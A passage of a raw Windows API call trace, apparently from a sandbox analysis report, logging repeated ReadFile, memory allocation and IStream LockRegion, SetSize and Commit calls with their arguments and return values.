lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.049] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.049] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.049] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.049] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.049] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.049] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x1000, lpOverlapped=0x0) returned 1 [0591.050] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb6c) returned 0x0 [0591.050] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x0, lpOverlapped=0x0) returned 1 [0591.050] CloseHandle (hObject=0x660) returned 1 [0591.050] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.050] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.050] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.050] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.050] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db4c) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db36) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x13, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db37) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x20, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db34) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x3c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x28, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x64, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x64, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadb) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x65, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dada) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x67, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dada) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x69, cb=0x0, dwLockType=0x0) returned 0x0 [0591.051] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dada) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.051] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadb) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dad8) returned 0x0 [0591.052] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2eef770 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x70, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dada) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x72, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dada) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x7fb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x7fb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dad8) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x7ff, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dabb) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7f) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6001, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6003, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6005, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.052] IStream:LockRegion (This=0x63a0a8, libOffset=0x6007, cb=0x0, dwLockType=0x0) returned 0x0 [0591.052] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7f) returned 0x0 [0591.052] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2eff7f8 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6008, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x600a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x600c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x600e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6010, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6012, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6014, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6016, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6018, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6767, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6767, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.053] IStream:LockRegion (This=0x63a0a8, libOffset=0x6768, cb=0x0, dwLockType=0x0) returned 0x0 [0591.053] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.053] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.054] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0a8, libOffset=0x6769, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.054] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.054] LocalFree (hMem=0x2edb848) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.054] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.054] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.054] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.054] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0591.054] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.054] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.054] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0591.055] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, 